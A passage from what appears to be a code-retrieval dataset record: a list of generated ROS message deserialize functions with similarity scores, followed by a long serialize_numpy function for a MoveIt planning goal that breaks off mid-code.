_x.VelN, _x.VelE, _x.VelZ, _x.GPSLong, _x.GPSLat, _x.GPSAlt, _x.Temp, _x.IMUTime, _x.BITStatus,) = _get_struct_2i16dih().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 8\n (self.time,) = _get_struct_d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.q_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern 
= '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qd_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qdd_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.i_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.m_target = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.q_actual = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.qd_actual = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.i_actual = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tool_acc_values = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tcp_force = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tool_vector = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.tcp_speed = struct.unpack(pattern, str[start:end])\n start = end\n end += 8\n (self.digital_input_bits,) = _get_struct_d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_temperatures = struct.unpack(pattern, str[start:end])\n _x = self\n start = end\n end += 24\n (_x.controller_timer, _x.test_value, _x.robot_mode,) = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.joint_modes = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 72\n (_x.health, _x.utcA0, _x.utcA1, _x.utcTOW, _x.utcWNT, _x.utcLS, _x.utcWNF, _x.utcDN, _x.utcLSF, _x.utcSpare, _x.klobA0, _x.klobA1, _x.klobA2, _x.klobA3, _x.klobB0, _x.klobB1, _x.klobB2, _x.klobB3, _x.flags,) = _get_struct_I2di6h8fI().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, payload: str) -> object:\n raise NotImplementedError()", "def deserialize(self, str):\n try:\n if self.accelerometer is None:\n self.accelerometer 
= None\n if self.gyro is None:\n self.gyro = None\n if self.orientation is None:\n self.orientation = None\n if self.led_color is None:\n self.led_color = None\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.name = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.name.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.position = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.velocity = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.effort = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.position_command = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.velocity_command = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.effort_command = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.accelerometer = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Vector3()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.accelerometer.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.gyro = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Vector3()\n _x = val1\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _get_struct_3d().unpack(str[start:end])\n self.gyro.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.orientation = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Quaternion()\n _x = val1\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _get_struct_4d().unpack(str[start:end])\n self.orientation.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.deflection = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.deflection_velocity = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_velocity = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_current = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = 
'<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_winding_current = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_sensor_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_winding_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.motor_housing_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.board_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.processor_temperature = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.voltage = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.led_color = []\n for i in range(0, length):\n val1 = std_msgs.msg.ColorRGBA()\n _x = val1\n start = end\n end += 16\n (_x.r, _x.g, _x.b, _x.a,) = _get_struct_4f().unpack(str[start:end])\n self.led_color.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.sequence_number = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.receive_time = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.transmit_time = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.hardware_receive_time = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sQ'%length\n start = end\n end += struct.calcsize(pattern)\n self.hardware_transmit_time = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def from_bytes(self, bytearr):\n if len(bytearr) >= SensorMessage.BYTE_LENGTH:\n if len(bytearr) > SensorMessage.BYTE_LENGTH:\n bytearr = bytearr[:SensorMessage.BYTE_LENGTH+1]\n if bytearr[0] == \"\\xca\" and bytearr[1] == \"\\x55\":\n # Checksum checking is taken care of at RF module.\n #if self.calc_checksum(bytearr[:-1]) == ord(bytearr[-1]):\n self.address = bytearr[2:7]\n try:\n (self.errorflags,\n self.temperature,\n self.humidity,\n self.supply_v,\n self.link_quality,\n self.message_id) = struct.unpack(\">BHHHBH\", bytearr[7:17])\n except:\n print \"Failed to unpack message: \" + format_hex(bytearr[7:])\n #else:\n # raise ValueError(\"Incorrect 
checksum: Given: \" + repr(ord(bytearr[-1])) + \", calc.: \" + repr(self.calc_checksum(bytearr[:-1])))\n else:\n raise ValueError(\"Incorrect message header!\")", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.Class = str[start:end].decode('utf-8')\n else:\n self.Class = str[start:end]\n _x = self\n start = end\n end += 40\n (_x.probability, _x.xmin, _x.ymin, _x.xmax, _x.ymax,) = _get_struct_d4q().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize_elem(self, elem_str):\n raise NotImplementedError()", "def deserialize(self, str):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name = str[start:end].decode('utf-8')\n else:\n self.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.red_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.red_v = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.yellow_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.yellow_v = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.green_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.green_v = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.purple_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.purple_v = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.orange_u = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sd'%length\n start = end\n end += struct.calcsize(pattern)\n self.orange_v = struct.unpack(pattern, str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def fromString(line: Union[bytes, str]) -> SBSMessage:\n if isinstance(line, bytes):\n line = line.decode()\n\n values = line.rstrip(DELIMITER).split(\",\")\n\n if len(FieldNames) != len(values):\n raise Exception(\n \"Incorrect number of msg fields. \"\n f\"Expected {len(FieldNames)}, got {len(values)}. 
\"\n f\"values={values}, line={line}\"\n )\n\n attrs = {}\n for k, v in zip(FieldNames, values):\n v = v.strip() # remove any surrounding spaces\n if v:\n # perform type conversion if necessary\n if k in IntegerFields:\n v = int(v)\n elif k in FloatFields:\n v = float(v)\n elif k in BooleanFields:\n v = True if v == \"1\" else False\n elif k in DateFields:\n Y, M, D = [int(i) for i in v.split(\"/\")]\n v = datetime.date(Y, M, D)\n elif k in TimeFields:\n H, M, S = v.split(\":\")\n S, F = S.split(\".\")\n microsecond = int(int(F) * 1e3)\n v = datetime.time(\n hour=int(H), minute=int(M), second=int(S), microsecond=microsecond\n )\n # elif k in StringFields:\n # v = v.strip()\n # else:\n # # field is expected to be a string field\n # logger.warning(\n # 'Unexpected field name: {}'.format(k))\n else:\n v = None\n\n attrs[k] = v\n\n return SBSMessage(**attrs)", "def _parse_data(self, queue_msg):\r\n try:\r\n result = json.loads(queue_msg)\r\n except (TypeError, ValueError):\r\n log.error(\"External message should be a JSON serialized dict.\"\r\n \" Received queue_msg = %s\", queue_msg)\r\n raise\r\n msg = result['msg']\r\n return msg", "def decode(self, s):\n o = self._decoder.decode(s)\n return o", "def deserialize(self, data):" ]
[ "0.76323575", "0.7464221", "0.73207736", "0.7303699", "0.72687525", "0.7223702", "0.72171384", "0.71758324", "0.7169619", "0.7095711", "0.7095332", "0.70419973", "0.70292974", "0.6962802", "0.6956721", "0.69556004", "0.6943546", "0.6941993", "0.6941265", "0.69108033", "0.689487", "0.6889617", "0.6885242", "0.6837955", "0.6822721", "0.68201894", "0.68069315", "0.67525154", "0.6748329", "0.6747656", "0.67444444", "0.6744092", "0.6742832", "0.6739201", "0.6736637", "0.6728817", "0.6722638", "0.6708985", "0.6696842", "0.6675396", "0.66607225", "0.66448754", "0.6643744", "0.66237944", "0.6615946", "0.6614162", "0.65969944", "0.65817744", "0.65817744", "0.65817744", "0.6568188", "0.6555641", "0.6539042", "0.6529792", "0.6529647", "0.65244603", "0.6518788", "0.65089136", "0.6495193", "0.6490092", "0.6488001", "0.6483333", "0.6469814", "0.64678913", "0.6463568", "0.6412189", "0.63987714", "0.6397207", "0.6381565", "0.6381565", "0.6381022", "0.63631445", "0.63589054", "0.63388366", "0.633666", "0.6330338", "0.6320053", "0.63184375", "0.63048506", "0.6295488", "0.62917304", "0.62891346", "0.62757844", "0.6274322", "0.62578094", "0.6255556", "0.62524223", "0.6239478", "0.6234485", "0.6228678", "0.62200373", "0.6217964", "0.6214624", "0.62042344", "0.61982083", "0.6192605", "0.61859655", "0.61754876", "0.6163846", "0.61581445" ]
0.6215644
92
serialize message with numpy array types into buffer
def serialize_numpy(self, buff, numpy): try: _x = self buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs)) _x = self.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_2I().pack(_x.goal_id.stamp.secs, _x.goal_id.stamp.nsecs)) _x = self.goal_id.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_3I().pack(_x.goal.request.workspace_parameters.header.seq, _x.goal.request.workspace_parameters.header.stamp.secs, _x.goal.request.workspace_parameters.header.stamp.nsecs)) _x = self.goal.request.workspace_parameters.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = self buff.write(_get_struct_6d3I().pack(_x.goal.request.workspace_parameters.min_corner.x, _x.goal.request.workspace_parameters.min_corner.y, _x.goal.request.workspace_parameters.min_corner.z, _x.goal.request.workspace_parameters.max_corner.x, _x.goal.request.workspace_parameters.max_corner.y, _x.goal.request.workspace_parameters.max_corner.z, _x.goal.request.start_state.joint_state.header.seq, _x.goal.request.start_state.joint_state.header.stamp.secs, _x.goal.request.start_state.joint_state.header.stamp.nsecs)) _x = self.goal.request.start_state.joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.start_state.joint_state.name) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.joint_state.name: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.request.start_state.joint_state.position) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.request.start_state.joint_state.position.tostring()) length = len(self.goal.request.start_state.joint_state.velocity) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.request.start_state.joint_state.velocity.tostring()) length = len(self.goal.request.start_state.joint_state.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(self.goal.request.start_state.joint_state.effort.tostring()) _x = self buff.write(_get_struct_3I().pack(_x.goal.request.start_state.multi_dof_joint_state.header.seq, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.secs, _x.goal.request.start_state.multi_dof_joint_state.header.stamp.nsecs)) _x = self.goal.request.start_state.multi_dof_joint_state.header.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(self.goal.request.start_state.multi_dof_joint_state.joint_names) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.joint_names: length = len(val1) if python3 or type(val1) == unicode: val1 = val1.encode('utf-8') length = len(val1) buff.write(struct.pack('<I%ss'%length, length, val1)) length = len(self.goal.request.start_state.multi_dof_joint_state.transforms) buff.write(_struct_I.pack(length)) for val1 
in self.goal.request.start_state.multi_dof_joint_state.transforms: _v297 = val1.translation _x = _v297 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v298 = val1.rotation _x = _v298 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(self.goal.request.start_state.multi_dof_joint_state.twist) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.twist: _v299 = val1.linear _x = _v299 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v300 = val1.angular _x = _v300 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.request.start_state.multi_dof_joint_state.wrench) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.multi_dof_joint_state.wrench: _v301 = val1.force _x = _v301 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v302 = val1.torque _x = _v302 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(self.goal.request.start_state.attached_collision_objects) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.start_state.attached_collision_objects: _x = val1.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v303 = val1.object _v304 = _v303.header buff.write(_get_struct_I().pack(_v304.seq)) _v305 = _v304.stamp _x = _v305 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v304.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v303.id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v306 = _v303.type _x = _v306.key length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = _v306.db length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v303.primitives) buff.write(_struct_I.pack(length)) for val3 in _v303.primitives: buff.write(_get_struct_B().pack(val3.type)) length = len(val3.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.dimensions.tostring()) length = len(_v303.primitive_poses) buff.write(_struct_I.pack(length)) for val3 in _v303.primitive_poses: _v307 = val3.position _x = _v307 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v308 = val3.orientation _x = _v308 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v303.meshes) buff.write(_struct_I.pack(length)) for val3 in _v303.meshes: length = len(val3.triangles) buff.write(_struct_I.pack(length)) for val4 in val3.triangles: buff.write(val4.vertex_indices.tostring()) length = len(val3.vertices) buff.write(_struct_I.pack(length)) for val4 in val3.vertices: _x = val4 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v303.mesh_poses) buff.write(_struct_I.pack(length)) for val3 in _v303.mesh_poses: _v309 = val3.position _x = _v309 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v310 = val3.orientation _x = _v310 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v303.planes) buff.write(_struct_I.pack(length)) for val3 in _v303.planes: buff.write(val3.coef.tostring()) length = len(_v303.plane_poses) buff.write(_struct_I.pack(length)) for val3 in _v303.plane_poses: _v311 = val3.position _x 
= _v311 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v312 = val3.orientation _x = _v312 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v303.subframe_names) buff.write(_struct_I.pack(length)) for val3 in _v303.subframe_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v303.subframe_poses) buff.write(_struct_I.pack(length)) for val3 in _v303.subframe_poses: _v313 = val3.position _x = _v313 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v314 = val3.orientation _x = _v314 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_b().pack(_v303.operation)) length = len(val1.touch_links) buff.write(_struct_I.pack(length)) for val2 in val1.touch_links: length = len(val2) if python3 or type(val2) == unicode: val2 = val2.encode('utf-8') length = len(val2) buff.write(struct.pack('<I%ss'%length, length, val2)) _v315 = val1.detach_posture _v316 = _v315.header buff.write(_get_struct_I().pack(_v316.seq)) _v317 = _v316.stamp _x = _v317 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v316.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(_v315.joint_names) buff.write(_struct_I.pack(length)) for val3 in _v315.joint_names: length = len(val3) if python3 or type(val3) == unicode: val3 = val3.encode('utf-8') length = len(val3) buff.write(struct.pack('<I%ss'%length, length, val3)) length = len(_v315.points) buff.write(_struct_I.pack(length)) for val3 in _v315.points: length = len(val3.positions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.positions.tostring()) length = len(val3.velocities) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.velocities.tostring()) length = len(val3.accelerations) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.accelerations.tostring()) length = len(val3.effort) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val3.effort.tostring()) _v318 = val3.time_from_start _x = _v318 buff.write(_get_struct_2i().pack(_x.secs, _x.nsecs)) buff.write(_get_struct_d().pack(val1.weight)) buff.write(_get_struct_B().pack(self.goal.request.start_state.is_diff)) length = len(self.goal.request.goal_constraints) buff.write(_struct_I.pack(length)) for val1 in self.goal.request.goal_constraints: _x = val1.name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) length = len(val1.joint_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.joint_constraints: _x = val2.joint_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.position, _x.tolerance_above, _x.tolerance_below, _x.weight)) length = len(val1.position_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.position_constraints: _v319 = val2.header buff.write(_get_struct_I().pack(_v319.seq)) _v320 = _v319.stamp _x = _v320 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v319.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2.link_name length = len(_x) if python3 
or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v321 = val2.target_point_offset _x = _v321 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v322 = val2.constraint_region length = len(_v322.primitives) buff.write(_struct_I.pack(length)) for val4 in _v322.primitives: buff.write(_get_struct_B().pack(val4.type)) length = len(val4.dimensions) buff.write(_struct_I.pack(length)) pattern = '<%sd'%length buff.write(val4.dimensions.tostring()) length = len(_v322.primitive_poses) buff.write(_struct_I.pack(length)) for val4 in _v322.primitive_poses: _v323 = val4.position _x = _v323 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v324 = val4.orientation _x = _v324 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) length = len(_v322.meshes) buff.write(_struct_I.pack(length)) for val4 in _v322.meshes: length = len(val4.triangles) buff.write(_struct_I.pack(length)) for val5 in val4.triangles: buff.write(val5.vertex_indices.tostring()) length = len(val4.vertices) buff.write(_struct_I.pack(length)) for val5 in val4.vertices: _x = val5 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) length = len(_v322.mesh_poses) buff.write(_struct_I.pack(length)) for val4 in _v322.mesh_poses: _v325 = val4.position _x = _v325 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v326 = val4.orientation _x = _v326 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_d().pack(val2.weight)) length = len(val1.orientation_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.orientation_constraints: _v327 = val2.header buff.write(_get_struct_I().pack(_v327.seq)) _v328 = _v327.stamp _x = _v328 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v327.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v329 = val2.orientation _x = _v329 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) _x = val2.link_name length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _x = val2 buff.write(_get_struct_4d().pack(_x.absolute_x_axis_tolerance, _x.absolute_y_axis_tolerance, _x.absolute_z_axis_tolerance, _x.weight)) length = len(val1.visibility_constraints) buff.write(_struct_I.pack(length)) for val2 in val1.visibility_constraints: buff.write(_get_struct_d().pack(val2.target_radius)) _v330 = val2.target_pose _v331 = _v330.header buff.write(_get_struct_I().pack(_v331.seq)) _v332 = _v331.stamp _x = _v332 buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs)) _x = _v331.frame_id length = len(_x) if python3 or type(_x) == unicode: _x = _x.encode('utf-8') length = len(_x) buff.write(struct.pack('<I%ss'%length, length, _x)) _v333 = _v330.pose _v334 = _v333.position _x = _v334 buff.write(_get_struct_3d().pack(_x.x, _x.y, _x.z)) _v335 = _v333.orientation _x = _v335 buff.write(_get_struct_4d().pack(_x.x, _x.y, _x.z, _x.w)) buff.write(_get_struct_i().pack(val2.cone_sides)) _v336 = val2.sensor_pose _v337 = _v336.header buff.write(_get_struct_I().pack(_v337.seq)) _v338 = _v337.stamp _x = _v338 